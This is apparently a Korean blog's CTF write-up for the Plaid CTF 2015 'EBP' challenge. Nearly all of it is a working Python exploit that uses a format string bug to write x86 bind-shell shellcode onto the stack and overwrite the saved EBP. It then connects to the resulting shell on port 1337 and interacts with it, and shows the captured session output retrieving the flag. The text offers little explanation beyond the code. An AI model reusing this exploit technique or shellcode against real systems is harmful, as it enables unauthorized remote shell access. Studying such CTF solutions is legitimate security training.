[exploit] Plaid CTF 2015 EBP writeup

[+] keyword : double format string bug, overwrite ebp

[!] 코드가 많이 복잡합니다 ㅎㅎ 그래도 코드만 올릴게요 :D

[!] 쉘코드는 bind shellcode를 이용하여 1337번 포트로 재접속하는 쉘코드를 사용했습니다.

#!/usr/bin/env python

import struct
import socket
import time
import telnetlib
p = lambda x: struct.pack( "<I", x )
up = lambda x: struct.unpack( ">I", x )[0]
host = "52.6.64.173"
port = 4545

# bind shellcode 
# ip : 0.0.0.0, port : 1337
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
nop = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += nop*3
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )
raw_input( "go>")

pay1 = "%x," * 24 + "\n"
s.send( pay1 )
data = s.recv( 1024 )
stack_base = int( data.split( "," )[3], 16 ) + 0x14
stack_base &= 0xffff0000
print "[+] Overwrite shellcode"
for i in range( len( shellcode )/2 ):
    pay = "%x" * 3
    pay += "a" * (300 + 2*i)
    pay += "%hn" + "\n"
    s.send( pay )
    s.recv( 1024 )
    pay = "%c" * 10
    pay += "%" + str(int( shellcode[i*2:i*2+2][::-1].encode( 'hex' ), 16 )-0xa)+ "c"
    pay += "%hn\n"
    s.send( pay )
    s.recv( 1024 )
print "[+] Finished overwrite!"
for j in range( 1, 3 ):
    pay = "%x" * 3
    pay += "a" * (300 + 2 * (i+j) )
    pay += "%hn\n"
    s.send( pay )
    s.recv( 1024 )
    pay = "%c" * 10
    if j == 1:
        pay += "%" + str( (300 + 2 * (i+j)) - len(shellcode)-1)+ "c"
    else:
        pay += "%" + str((stack_base >> 0x10)-0xa) + "c"
    pay += "%hn\n"
    s.send( pay )
    print s.recv( 1024 )
index = 300 + 2*(i + j) - 0x6   # for backward
pay = "%x" * 3
pay += "a" * index
pay += "%hn\n"
s.send( pay )
print s.recv( 1024 )
print "[+] Open : %s:1337" % host
time.sleep( 2 )
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, 1337 ) )
print "[+] Connected success!"
print "bk#"
t = telnetlib.Telnet()
t.sock = s
t.interact()
s.close()
'''
ls
ebp
flag.txt
id  
uid=1001(problem) gid=1001(problem) groups=1001(problem)
cat flag.txt
who_needs_stack_control_anyway?
'''

저작자표시

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[coding] DEFCON CTF Qualifier 2015, catwestern Writeups (0)	2015.05.18
[exploit] DEFCON CTF Qualifier 2015, babyecho Writeups (3)	2015.05.18
[exploit] 홀리쉴드 2014 catlang writeups (2)	2014.11.28
[misc] 홀리쉴드 2014 magiceye writeup (0)	2014.11.25
[exploit] 홀리쉴드 2014 kitty writeups (1)	2014.11.25

Hello, Stranger

[exploit] Plaid CTF 2015 EBP writeup

'Security > [게임] CTF 풀이' 카테고리의 다른 글

티스토리툴바

[exploit] Plaid CTF 2015 EBP writeup

'Security > [게임] CTF 풀이' 카테고리의 다른 글

관련글

티스토리툴바